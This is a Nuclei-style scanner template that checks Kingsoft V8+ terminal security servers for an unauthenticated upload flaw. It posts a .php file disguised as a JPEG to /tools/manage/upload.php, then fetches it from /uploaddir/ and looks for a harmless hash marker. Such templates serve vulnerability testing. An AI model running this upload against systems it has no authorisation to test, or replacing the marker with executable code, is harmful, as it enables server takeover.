id: Kingsoft-upload

info:
  name: 猎鹰安全-金山V8+终端安全系统上传漏洞
  author: Str1am
  severity: high
  reference: https://github.com/hectongh/2021HVV-/blob/f4802669189941b5bb24e9153bf0ec5c2ca5686a/0419/%E9%87%91%E5%B1%B1%20V8%20-V9%20%E7%BB%88%E7%AB%AF%E5%AE%89%E5%85%A8%E7%B3%BB%E7%BB%9F%E6%BC%8F%E6%B4%9E%E5%90%88%E9%9B%86.md
  tags: Kingsoft,upload

requests:
  - raw:
      - |
        POST /tools/manage/upload.php HTTP/1.1
        Host: {{Hostname}}
        X-Requested-With: XMLHttpRequest
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryCmFouLjmLS7D4iZr
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

        ------WebKitFormBoundaryCmFouLjmLS7D4iZr
        Content-Disposition: form-data; name="file"; filename="4bbc9855ce373d60847521589b287ced.php"
        Content-Type: image/jpeg

        202cb962ac59075b964b07152d234b70
        ------WebKitFormBoundaryCmFouLjmLS7D4iZr--

      - |
        GET /uploaddir/4bbc9855ce373d60847521589b287ced.php HTTP/1.1
        Host: {{Hostname}}


    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "202cb962ac59075b964b07152d234b70"
        part: body
        condition: and